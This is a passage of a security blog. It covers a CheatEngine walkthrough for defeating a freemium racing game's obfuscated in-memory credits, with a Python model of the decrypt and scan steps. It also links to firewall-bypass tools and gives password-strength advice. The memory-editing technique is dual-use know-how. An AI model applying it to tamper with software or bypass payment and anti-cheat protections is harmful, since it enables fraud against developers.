<li><a href="http://blogs.microsoft.com/cybertrust/2013/06/03/microsoft-releases-new-mitigation-guidance-for-active-directory/" target="_blank">AD explorer tool to diff AD</a></li>
<li><a href="http://www.ntdsxtract.com/downloads/ntdsxtract/ntds_forensics.pdf" target="_blank">NTDS forensics</a></li>
<li><a href="https://bitbucket.org/iwseclabs/bta" target="_blank">BTA</a> (thx to Sn0rkY)</li>
</ul>
<br />
<br /></div>
<h3>
Lessons learned</h3>
But guess what, not all of these problems are solved by rebuilding the AD. One has to rebuild all the computers from scratch as well. Which seems quite impossible. When someone is creating a new AD, it is impossible not to migrate some configuration/data/files from the old domain. And whenever this happens, there is a risk that the new AD will be backdoored as well.<br />
<br />
Ok, we are doomed, but what can we do? I recommend proper log analysis: analyze trends and detect strange patterns in your network. Better to spend money on these than on the domain rebuild. And when you find something, do a proper incident response. And good luck!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Ps: Thanks to Andrew, EQ, and Tileo for adding new ideas to this post.<br />
<br />
Check out the <a href="https://jumpespjump.blogspot.hu/2015/05/many-ways-of-malware-persistence-that.html" target="_blank">host backdooring</a> post as well! :)</div>
</div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com4tag:blogger.com,1999:blog-7429675726481888518.post-5064678794481384942015-01-14T20:47:00.002+01:002019-10-08T15:45:26.866+02:00Hacking freemium games - the evolution of PC game cheating<div style="text-align: justify;">
This post is going to be a rather strange post compared to previous ones. But bear with me, in the middle of the post you will see why this post fits the IT security topic.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I'm also terribly sorry for not posting recently, but I was busy with my <a href="http://www.securitytube-training.com/online-courses/securitytube-python-scripting-expert/" target="_blank">SPSE</a> and <a href="http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/index.html" target="_blank">SLAE</a> certification. Both are recommended for Python and Assembly noobs like me. But back to this post.<br />
<br /></div>
<h2 style="text-align: justify;">
A little bit of history</h2>
<div style="text-align: justify;">
Cheating in games started as help for game testers. By using invincibility or infinite ammo testers were able to test the game quicker, which meant less money spent on testing. I personally use cheat codes in games, depending on my mood. Sometimes it feels good to slash all the opponents while I'm invincible, sometimes it is more fun to play the game without cheats. One can argue whether cheating in games is OK or not, but I believe it depends, there is no black or white. But one thing is for sure, it is part of the gaming industry. There is huge demand for cheats. There were even cheat books printed on paper...</div>
<div style="text-align: justify;">
<br /></div>
<div align="justify">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsaIjpO9BcHl5eFrSg5fwOSOzj2TdMSZ0w-7N-mqBRnYu05guCdIKQj-PWaPoFI_WQUH_k5hA0OwRn96LUTG4eZVLl88FIad6OmUS3yWL517lVW3PV0xezs7aPI-Ll2W-836roEVe0b6fu/s1600/cheats10.jpg" style="margin-left: 1em; margin-right: 1em;"><img align="justify" border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsaIjpO9BcHl5eFrSg5fwOSOzj2TdMSZ0w-7N-mqBRnYu05guCdIKQj-PWaPoFI_WQUH_k5hA0OwRn96LUTG4eZVLl88FIad6OmUS3yWL517lVW3PV0xezs7aPI-Ll2W-836roEVe0b6fu/s1600/cheats10.jpg" width="228" /></a></div>
</div>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
The different types of cheats (on PC)</h2>
<div style="text-align: justify;">
There are different types of cheats in PC gaming. The following is an incomplete list of these cheats:<br />
<br /></div>
<h3 style="text-align: justify;">
Cheat codes</h3>
<div style="text-align: justify;">
The good old IDDQD type of cheats. These are left in the game by the developers intentionally. Nothing interesting here.<br />
<br /></div>
<h3 style="text-align: justify;">
Edit memory</h3>
<div style="text-align: justify;">
This is my favorite; I will talk about it at the end of the post. Whenever a user launches a new program, the program's whole memory is accessible (read/write) to every other program launched by the same user. And since the memory stores the current game state (health, ammo, armor, etc.), these values can be changed easily. In the good old times, there were <a href="http://ready64.it/articoli/_files/043_pokesc64.txt" target="_blank">POKE</a> commands to do these cheats, and the memory address to write to was published by people who had found where the game stores its most critical state.<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnNZyyWMLrhPAh7_G3oMykKPhxnA4IuAwPoxMA4R3HhyphenhyphenXVYujbCwhvtOeLbLMvp3Ern39HEWrtPO1SerxMeqCGtnHo3cw4LvLor9ixs8-h85kcGikeSLEskqc-8-1B5hI9DF4_7TRptK59/s1600/hqdefault.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnNZyyWMLrhPAh7_G3oMykKPhxnA4IuAwPoxMA4R3HhyphenhyphenXVYujbCwhvtOeLbLMvp3Ern39HEWrtPO1SerxMeqCGtnHo3cw4LvLor9ixs8-h85kcGikeSLEskqc-8-1B5hI9DF4_7TRptK59/s1600/hqdefault.jpg" width="400" /></a></div>
<h3 style="text-align: justify;">
Code injection</h3>
<div style="text-align: justify;">
This is like patching the game code. For example, one can replace the "DEC (pointer to your current health)" instruction with NOP (do nothing), thus becoming invincible. In multi-player cheats there is the aimbot to help you aim at enemies, the wallhack to see through walls, enlarging the enemy's hitbox for easier hits, or, in MMORPGs, macros that collect items while the player is not online. I would say the so-called "<a href="http://en.wikipedia.org/wiki/Trainer_(games)" target="_blank">trainers</a>" more or less fit into this category and the previous one.<br />
<br /></div>
<h3 style="text-align: justify;">
Saved game editor</h3>
<div>
<div style="text-align: justify;">
The first time a kid meets a hex-editor <i>(just like the co-author of this blog did with SIM City when he was 10 years old - David)</i>. It can teach a lot about file structures, the hexadecimal numeral system, etc. Fun times. </div>
<div style="text-align: justify;">
<br /></div>
</div>
<h3 style="text-align: justify;">
Hacking game server</h3>
<div>
<div style="text-align: justify;">
Not very common, but even more fun. Warning: endless trolling possibilities in multi-player games ahead :) How to hack a game server? Well, I think this might deserve another full blog post ...</div>
<div style="text-align: justify;">
<br /></div>
</div>
<h3 style="text-align: justify;">
Network traffic hacking</h3>
<div>
<div style="text-align: justify;">
One last type of cheating worth mentioning is modifying the network traffic between the client and the game server. AFAIK SSL is not universal in gaming, so stunnel is not needed for this hack, but ettercap can help in changing the communication.</div>
</div>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
Why is cheating becoming more critical (and challenging)?</h2>
<div style="text-align: justify;">
Now, in the age of in-app payments, game creators no longer think of cheats as funny things but as something to be destroyed to the ground, because cheating decreases their revenue. Or not. At least they think it does. To quote Wikipedia here, "cheating in such games is nonetheless a legal grey area because there are no laws against modifying software which is already owned, as detailed in the Digital Millennium Copyright Act." </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
A lot of online games include anti-cheating components like PunkBuster, nProtect GameGuard, or Valve Anti-Cheat. This whole cheating/anti-cheating industry is the same as the virus/anti-virus industry. A cat and mouse game.<br />
<br /></div>
<h3 style="text-align: justify;">
Freemium games</h3>
<div style="text-align: justify;">
If you have not played "freemium" games, you should watch South Park season 18, episode 6, "Freemium Isn't Free." If you have played freemium games, you definitely have to watch it :) There are many problems with freemium games. They are free to install and free to play. The first 3-4 hours might be fun. But after that, it turns out it is impossible to advance in the game without paying money for it. And by spending cash, I mean spending a LOT! Let's have a look at today's example, an arcade racing video game.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuxlxeqZxfwfgKyiMTM2r16RarOfNfyS_FW-B4f2IkY1tJbrY2gxtRx6b4efnRkmp2SFVTZz4kl7jooa-QeWc90qTnn-BATQjj5omwaSSyBg4tZ0jFvKlpDzvonmZAAyDEvWcoYx2G064g/s1600/asphalt1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="267" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuxlxeqZxfwfgKyiMTM2r16RarOfNfyS_FW-B4f2IkY1tJbrY2gxtRx6b4efnRkmp2SFVTZz4kl7jooa-QeWc90qTnn-BATQjj5omwaSSyBg4tZ0jFvKlpDzvonmZAAyDEvWcoYx2G064g/s1600/asphalt1.png" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
For 99.99 USD, you can get 3 000 000 credits. For almost double the price of a new PC game, you get these credits. In this particular game, I estimate one has to play ~6-24 hours constantly to get this amount of credit. And by playing ~6 hours, I mean 6 hours without progress in the game! Kind of boring. And what do you get for 3 000 000 credits? You can buy one of the most expensive cars, but can't tune it fully. You have to play more (without progress) or buy more. But guess what, there are more cars you can't buy by only playing the game. Those are only available via in-app purchase.<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuuxO5-eaLaMeXTg3W3dmrzA6lShjuBK9bdsBTnOMqYFBJSVgL_6cDeRP3LS2WcRZBoR2uGBuo_Yqavt-zhyphenhyphenvXAHpirpSYuYGlOx-eCzr6ipOL2tDzbnwa0Pgi1uZMXqFPNubqZaNIU_yg/s1600/asphalt2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="271" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuuxO5-eaLaMeXTg3W3dmrzA6lShjuBK9bdsBTnOMqYFBJSVgL_6cDeRP3LS2WcRZBoR2uGBuo_Yqavt-zhyphenhyphenvXAHpirpSYuYGlOx-eCzr6ipOL2tDzbnwa0Pgi1uZMXqFPNubqZaNIU_yg/s1600/asphalt2.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Even though the player has 58 765 533 credits, it is not possible to buy this car. It is only available for real money.<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPT18_zJPF0nZLzDiaJdnI00Lvxk8B1Qw8S5gM0yGdLoUeCBbnSZRrKEX0LmXBL6UM_5tEve19-FET8nYCW5Kd-NqwUse8CiGIKIsPBH_pml_jHjuC8kKN59_vV6WWMypk_vEa_CCToSsx/s1600/asphalt3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPT18_zJPF0nZLzDiaJdnI00Lvxk8B1Qw8S5gM0yGdLoUeCBbnSZRrKEX0LmXBL6UM_5tEve19-FET8nYCW5Kd-NqwUse8CiGIKIsPBH_pml_jHjuC8kKN59_vV6WWMypk_vEa_CCToSsx/s1600/asphalt3.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
So, what are your possibilities? You are either Richie Rich and can afford to buy these. Or you can be insane and try to play the game without in-app purchases. Or give up the game and try another freemium ... Or, you can try to hack the game!<br />
<br /></div>
<h2 style="text-align: justify;">
Hack all the freemium games!</h2>
<div style="text-align: justify;">
Although I was not playing this racing game from day one, I was able to witness the evolution of the cheats against this game. Cheats that worked one day were not working a month later. The game is continuously updated to defeat newly published cheats.<br />
<br /></div>
<h3 style="text-align: justify;">
Noob start</h3>
<div style="text-align: justify;">
So, I want to hack this game; what is the first thing a noob like me does? <strike>Bing it!</strike> Google it! </div>
<div style="text-align: justify;">
From the first page result, let's check this tool:</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNg2I-l4MAhSbytqgdO45sAluDHkw8nm0xdLj1Dn8hEPqKfiX16oF-pzo-Mu-R2PWIajkuydCn9Aet7gObkdS2SMyeAY37se1vSnPgBnWYvPhdUupXAkdnUjCwCSVHF6qkeQS3VWRqkl0A/s1600/Asphalt-8-Airborne-Hack-Tool-Screenshot.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNg2I-l4MAhSbytqgdO45sAluDHkw8nm0xdLj1Dn8hEPqKfiX16oF-pzo-Mu-R2PWIajkuydCn9Aet7gObkdS2SMyeAY37se1vSnPgBnWYvPhdUupXAkdnUjCwCSVHF6qkeQS3VWRqkl0A/s1600/Asphalt-8-Airborne-Hack-Tool-Screenshot.png" width="390" /></a></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
While trying to download that, I just had to give my email address to spammers, or have my mobile number subscribed to premium rate text messages. What fun.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKNd4e2Phf4nqqyf8Ma3lWWmkhU8iVOsu-3QAYUSadm_9DrgcsqyXZBjKY9bx3nQNdB9s9ZtHkceQ5ci_oa4n4q6nsGrKSfbMighfSqgZfKGTk8dei9azgVBZe6BB8DQWv3IQxAB2HJlY9/s1600/asphalt4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="313" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKNd4e2Phf4nqqyf8Ma3lWWmkhU8iVOsu-3QAYUSadm_9DrgcsqyXZBjKY9bx3nQNdB9s9ZtHkceQ5ci_oa4n4q6nsGrKSfbMighfSqgZfKGTk8dei9azgVBZe6BB8DQWv3IQxAB2HJlY9/s1600/asphalt4.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Another "cheat" program will install malware/adware on your computer. <b><u><span style="color: red;">Never ever try these programs.</span></u></b> They are fake 99% of the time, and after installing them you will have another problem, not just how to hack freemium games.<br />
<br /></div>
<h3 style="text-align: justify;">
Beginners start - Cheat engine</h3>
<div>
<span style="text-align: justify;">When I first heard about hacking games in memory, I visualized hours of OllyDBG/ImmunityDBG/(insert your favorite Windows debugger here). It turned out there are specialized tools to help you cheat in the game, with no assembly knowledge required. My favourite tool is </span><a href="http://www.cheatengine.org/downloads.php" style="text-align: justify;" target="_blank">CheatEngine</a><span style="text-align: justify;">. I highly recommend downloading it and spending 10 minutes on the built-in tutorial levels to get a feeling for this tool. It's super duper awesome.</span><br />
<span style="text-align: justify;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjp-D9wj1bvaIGBVHCNrKsk9rbyHvYgicQR7y0P9qf0b10Ob1x_3trBwBKC0IhfMJ4qXNFOpGdUWzxViRyFSLXD9LpWKC5NE5tz90PmDI1Oo_zLWbXUJX9mOlHzsVPX-HhyphenhyphendZolMyyCvXv/s1600/cheat.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="468" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjp-D9wj1bvaIGBVHCNrKsk9rbyHvYgicQR7y0P9qf0b10Ob1x_3trBwBKC0IhfMJ4qXNFOpGdUWzxViRyFSLXD9LpWKC5NE5tz90PmDI1Oo_zLWbXUJX9mOlHzsVPX-HhyphenhyphendZolMyyCvXv/s1600/cheat.png" width="640" /></a></div>
<div>
<span style="text-align: justify;"><br /></span></div>
<div>
<span style="text-align: justify;"><br /></span></div>
<div>
<div style="text-align: justify;">
When I first tried to hack this game myself, I scanned the memory for my actual credit and tried to change it, with no luck. Keep reading, you will see what happened.<br />
<br />
The second cheat I tried with cheat engine was <a href="https://www.youtube.com/watch?v=kz9k4vOpns0" target="_blank">something like this</a>: </div>
</div>
<div>
<ol>
<li style="text-align: justify;">Start the game, play the first level, and check how many credits are paid for winning the race. Pro tip: use a dual display for full-screen game cheating.</li>
<li style="text-align: justify;">Restart the same level and attach Cheat Engine to the game's process</li>
<li style="text-align: justify;">Scan the memory for the credit value at the beginning of the race</li>
<li style="text-align: justify;">Scan the memory for the credit value again at the end of the race. The intersection of the first and second scans includes the real location where the credit paid for winning the race is stored.</li>
<li style="text-align: justify;">Change the values (both the real one and some false positives) to something big</li>
<li style="text-align: justify;">Watch the game crash</li>
<li style="text-align: justify;">Be amazed at the money you received</li>
</ol>
<div>
<div style="text-align: justify;">
Nowadays, most of the cheats on YouTube do not work, except for <a href="https://www.youtube.com/watch?v=f5a3CGVLwAI" target="_blank">this kind of cheat</a>. I don't want to recreate that tutorial, so you should watch it first, then come back.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5Wqfoe7HWj-c2Jrwx6J4bLcand3l0Jjsi946Csouii9L7TiOv48ixFnAzEtXjo74ml1c6xaVCrI5Ltnt5mPjOmeDeD5no4Kz3lPFu2qbAhHy7TD9i7K6OE8ZtpaEQ5HQhVEvr2pohlWnn/s1600/asphalt5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5Wqfoe7HWj-c2Jrwx6J4bLcand3l0Jjsi946Csouii9L7TiOv48ixFnAzEtXjo74ml1c6xaVCrI5Ltnt5mPjOmeDeD5no4Kz3lPFu2qbAhHy7TD9i7K6OE8ZtpaEQ5HQhVEvr2pohlWnn/s1600/asphalt5.png" width="616" /></a></div>
<br />
<br /></div>
</div>
</div>
<div>
<div style="text-align: justify;">
Are you back? Great. Do you have any idea what you have just seen? No? Well, in that case, don't try this at home. Copy-pasting <a href="http://blog.zoller.lu/2009/07/0pen0wnc-shellcode-dissasembled.html" target="_blank">assembly code from random internet posts</a> and running it on your computer is always a bad idea. It is precisely as risky as downloading free programs from random internet sites.<br />
<br />
Although I have not seen people trolling others with this kind of Cheat Engine shellcode, I think the time will come when it is turned into something terrible. Such shellcode might work, or it might harm your computer. The good news is that we can look at the code and analyze it. </div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
When you open CheatEngine and try to define a new custom type, you are greeted with skeleton assembly code. I don't want to detail what all of the skeleton code does; let's just focus on the difference between the skeleton code and the code used in the video. This is the "decrypt function":</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<pre class="prettyprint">xor eax, 0baadf00d    ; undo the XOR with 0xbaadf00d
rol eax, 0e           ; undo the rotate-right by 0xe (14) with a rotate-left
</pre>
<div style="text-align: justify;">
<br /></div>
<div>
<div style="text-align: justify;">
What does it mean? The actual credit is encrypted in memory, so if you scan for its plain value, you won't find it. But! The encryption rotates the value to the right (ROR) by 0xE (14 in decimal), and after that it is XOR-ed with 0xbaadf00d. Decrypting it means applying the inverse functions in reverse order (in this particular case, the order does not matter, but that's not the point). The inverse function of XOR is XOR, and the inverse function of ROR (rotate right) is ROL (rotate left). Now that we have analyzed the assembly code, we can be sure that it is safe to execute. Just follow the video and watch your coins fall from the sky. For free. In a freemium game. Have fun!<br />
<br />
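A Python model of the decrypt function above and of the two-snapshot scan from the numbered steps earlier, added here as an example (it is not the post's own code, nor CheatEngine's): it re-creates the obfuscation the post describes on a constructed in-memory buffer, shows why the plain value scan found nothing, scans through the decrypt function the way a custom type would, and includes the swapped order of the two inverse steps for comparison. The buffer layout, the credit values and the noise dwords are constructed assumptions.

```python
import struct

MASK32 = 0xFFFFFFFF
KEY = 0xBAADF00D   # the XOR constant in the page's decrypt function
ROT = 14           # 0xE, the rotate count in the page's decrypt function


def ror32(x: int, n: int) -> int:
    """Rotate a 32-bit value right by n bits (x86 ROR)."""
    n %= 32
    return ((x >> n) | (x << (32 - n))) & MASK32


def rol32(x: int, n: int) -> int:
    """Rotate a 32-bit value left by n bits (x86 ROL)."""
    n %= 32
    return ((x << n) | (x >> (32 - n))) & MASK32


def encrypt_credit(value: int) -> int:
    """How the game stores the credit, as the post describes it: ROR by 14, then XOR."""
    return ror32(value & MASK32, ROT) ^ KEY


def decrypt_credit(stored: int) -> int:
    """The page's two instructions: xor eax, 0baadf00d ; rol eax, 0e.

    Inverse operations in reverse order: XOR undoes the XOR, ROL undoes the ROR.
    """
    return rol32(stored ^ KEY, ROT)


def decrypt_swapped(stored: int) -> int:
    """The same two inverse operations applied in the other order, for comparison."""
    return rol32(stored, ROT) ^ KEY


def scan(snapshot: bytes, target: int, transform=lambda v: v) -> set:
    """Offsets of every 4-byte-aligned dword that equals target after `transform`.

    `transform` plays the role of a CheatEngine custom type: each candidate
    dword is decoded before it is compared, so an obfuscated value can be found.
    """
    hits = set()
    for off in range(0, len(snapshot) - 3, 4):
        (dword,) = struct.unpack_from("<I", snapshot, off)
        if transform(dword) == target:
            hits.add(off)
    return hits


def locate_credit(before: bytes, v_before: int, after: bytes, v_after: int,
                  transform=lambda v: v) -> set:
    """Steps 3 and 4 of the post: intersect the hits of two snapshots."""
    return scan(before, v_before, transform) & scan(after, v_after, transform)


# Constructed "game memory" (an assumption for this example): four unrelated
# dwords, two of which happen to equal the credit values (false positives),
# then the credit itself at offset 16, then a zero dword.
NOISE = (1000, 7, 1500, 42)
CREDIT_OFFSET = 16


def build_memory(credit: int, obfuscated: bool) -> bytes:
    """Lay out the constructed buffer with the credit stored plain or obfuscated."""
    stored = encrypt_credit(credit) if obfuscated else credit
    return struct.pack("<6I", *NOISE, stored, 0)


def demo() -> dict:
    """Run the three scans the post talks about and return their hit sets."""
    results = {}
    # Plain storage: the two-snapshot intersection isolates the real address.
    results["plain"] = locate_credit(build_memory(1000, False), 1000,
                                     build_memory(1500, False), 1500)
    # Obfuscated storage: a plain value scan finds nothing, as the post describes.
    results["obfuscated_plain_scan"] = locate_credit(build_memory(1000, True), 1000,
                                                     build_memory(1500, True), 1500)
    # Obfuscated storage scanned through the decrypt function (the custom type).
    results["obfuscated_custom_type"] = locate_credit(build_memory(1000, True), 1000,
                                                      build_memory(1500, True), 1500,
                                                      decrypt_credit)
    return results


if __name__ == "__main__":
    print(hex(encrypt_credit(1000)), decrypt_credit(encrypt_credit(1000)))
    print(demo())
```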
<h3>
Encrypt memory - applications at financial institutions</h3>
</div>
<div style="text-align: justify;">
Another interesting thing is that I don't recall any thick client applications in the financial industry encrypting values in memory. I agree there are more significant problems with thick client applications than not encrypting the essential values in memory. But still, some thick client applications are regularly updated and maintained. Maybe it is a good idea to encrypt the values in memory. It will make attackers' lives harder. Not impossible, but harder. Perhaps the developers of these applications should learn from the gaming industry (or from malware developers, for that matter), because it is a shame that an arcade racing game or an FPS is protected better than an application responsible for transacting millions of dollars. Just think about the RAM scraping malware stealing millions of credit card data ...<br />
<br /></div>
<h2 style="text-align: justify;">
Moral of the story</h2>
</div>
<div style="text-align: justify;">
Cheating is part of gaming history, and freemium games are trying to take cheats away from gamers because they want money. Thanks to CheatEngine and some clever hacks, these programs can still be beaten. And guess what, there is a CheatEngine for Android, although it did not work for me on the latest Android. And sometimes, hacking all kinds of applications can be more comfortable with CheatEngine than with traditional debuggers.<br />
<br />
Also, always check the code before executing it! And when you find something cool, publish it, so everyone can enjoy the games!<br />
<br />
<br /></div>
<h1>Bypass hardware firewalls</h1>
Published 2014-11-09 (updated 2014-12-08) by <a href="http://www.blogger.com/profile/12373001166765443215">Z</a>.<br />
This is just a collection of links about my DEF CON 22 presentation and the two tools I released:<br />
<br />
Slides:<br />
<a href="http://www.slideshare.net/bz98/defcon-22-bypass-firewalls-application-white-lists-secure-remote-desktops-in-20-seconds" target="_blank">http://www.slideshare.net/bz98/defcon-22-bypass-firewalls-application-white-lists-secure-remote-desktops-in-20-seconds</a><br />
<br />
Tools:<br />
<a href="https://github.com/MRGEffitas/Write-into-screen" target="_blank">https://github.com/MRGEffitas/Write-into-screen</a><br />
<a href="https://github.com/MRGEffitas/hwfwbypass" target="_blank">https://github.com/MRGEffitas/hwfwbypass</a><br />
<br />
Presentation video from Hacktivity:<br />
<a href="https://www.youtube.com/watch?v=KPJBckmhtZ8" target="_blank">https://www.youtube.com/watch?v=KPJBckmhtZ8</a><br />
<br />
Technical blog post:<br />
<a href="https://blog.mrg-effitas.com/bypass-hardware-firewalls-def-con-22/" target="_blank">https://blog.mrg-effitas.com/bypass-hardware-firewalls-def-con-22/</a><br />
<br />
Have fun!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfnZ8BkQ0ffrygrDsMHGElmqec36pP9WV-qOv9Lj3PB6Lv-5gR68Q0DJp-SwQAtwd0igRe0rASdUOwnyxlPUvrWApN_LgKIl2nXCMUBrEVsqrlfAmRkOlDApeu6gz2EJFEVENCQ2ntsMbC/s1600/hwfwbypass+(1).jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfnZ8BkQ0ffrygrDsMHGElmqec36pP9WV-qOv9Lj3PB6Lv-5gR68Q0DJp-SwQAtwd0igRe0rASdUOwnyxlPUvrWApN_LgKIl2nXCMUBrEVsqrlfAmRkOlDApeu6gz2EJFEVENCQ2ntsMbC/s1600/hwfwbypass+(1).jpg" height="240" width="320" /></a></div>
<br />
<br />
<br />
<h1>Change passwords regularly - a myth and a lie, don't be fooled, part 2</h1>
Published 2014-10-13 (updated 2019-10-08) by <a href="http://www.blogger.com/profile/12373001166765443215">Z</a>.
<div style="text-align: justify;">
In the <a href="http://jumpespjump.blogspot.hu/2014/10/change-passwords-regularly-myth-and-lie.html" target="_blank">previous blog post</a>, I have covered the different passwords you have to protect, the attackers and attack methods. Now let's look at how we want to solve the issue. </div>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
Password requirements</h2>
<div style="text-align: justify;">
So far we have learned we have to use long, complex, true random passwords. In theory, this is easy.</div>
<div style="text-align: justify;">
Now, this is my password advice for 2014:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Password character classes</b></div>
<div style="text-align: justify;">
Use upper-lower-digit-special characters in general cases.</div>
<div style="text-align: justify;">
If you don't understand what I just wrote, choose from this:</div>
<div style="text-align: justify;">
qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM0123456789-=[];'\,./<>?:"|{}_+!@#$%^&* ()`~</div>
<div style="text-align: justify;">
If you are a CISO and say "use 3 out of 4 character classes", everyone will use Password12 or Welcome12 as their password (after the 12th enforced password change).</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Password length</b></div>
<div style="text-align: justify;">
This is basically the only thing that changes depending on whether the password is in the very high/high/medium/low level. Check the previous blog post for the details about the very high/high/medium/low levels.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Password length: Very high level class (including work-related/enterprise passwords)</b></div>
<div style="text-align: justify;">
15 characters (or 20 if you are really paranoid). Making true random passwords longer than 20 characters usually does not make any sense, even in high security scenarios (e.g. military, spy agencies, etc.). 15 characters in a Windows environment is a good choice, as no LM hash can be stored for a 15 character password, so one (effective) attack won't work. Beware, there might be bugs with 15 character passwords, with a low probability.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Password length: High-level</b><b> class</b></div>
<div style="text-align: justify;">
12 characters, upper-lower-special characters</div>
<div style="text-align: justify;">
<b><br /></b><b>Password length: </b><b>Medium class</b></div>
<div style="text-align: justify;">
10 characters, upper-lower-special characters, still <a href="http://www.gergely.risko.hu/debian-dsa1571/random4.jpg" target="_blank">TRUE random</a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Password length: Low-level</b><b> class</b></div>
<div style="text-align: justify;">
9 characters. Why less?</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Pin codes</b></div>
<div style="text-align: justify;">
Always choose the longest provided, but a maximum of 8. Usually, more is pretty impractical.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Password randomness</b></div>
<div style="text-align: justify;">
True random, generated by a (local) computer. Avoid Debian. Avoid random generated by your brain. Do not use l33tsp33k. Do not append or prepend the current month, season or year to a word. Do not use Star Wars/Star Trek/(your favorite movie/series here) characters or terminology. In general, avoid any pattern like the above ones. The chances that a true random password generator generates SkyWalker12 are very, very low. And believe me, it is not that hard to crack those. Every algorithm you could come up with, the bad guys have already thought of. Use true random. Let the computer do it for you. See details later in this post.</div>
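What "let the computer do it for you" can look like in practice, as an added example that is not the post's own tool: a generator that draws from the operating system's CSPRNG over the exact character list printed above, uses the lengths this post gives per level, and counts how many of the four classes a password contains (which is how Password12 satisfies a 3-of-4 rule). The level names are this example's own labels.

```python
import math
import secrets
import string

# The four character classes from "Password character classes" above; together
# they are the full list printed there (the 95 printable ASCII characters).
LOWER = string.ascii_lowercase
UPPER = string.ascii_uppercase
DIGITS = string.digits
SPECIAL = "-=[];'\\,./<>?:\"|{}_+!@#$%^&* ()`~"
ALPHABET = LOWER + UPPER + DIGITS + SPECIAL

# Lengths per security level as given in this post; PINs are capped at 8.
LENGTH_BY_LEVEL = {"very_high": 15, "high": 12, "medium": 10, "low": 9}
MAX_PIN_LENGTH = 8


def character_classes(password: str) -> int:
    """How many of the four classes a password contains (a 3-of-4 rule requires >= 3)."""
    return sum(any(c in cls for c in password) for cls in (LOWER, UPPER, DIGITS, SPECIAL))


def generate_password(level: str) -> str:
    """Uniform draw from the full alphabet, redrawn until all four classes are present.

    secrets.choice uses the OS CSPRNG; the redraw only rejects the rare draws
    that miss a class, which costs a fraction of a bit of entropy at these lengths.
    """
    length = LENGTH_BY_LEVEL[level]
    while True:
        candidate = "".join(secrets.choice(ALPHABET) for _ in range(length))
        if character_classes(candidate) == 4:
            return candidate


def generate_pin(max_allowed: int) -> str:
    """The longest PIN the service allows, but no more than 8, every digit random."""
    length = min(max_allowed, MAX_PIN_LENGTH)
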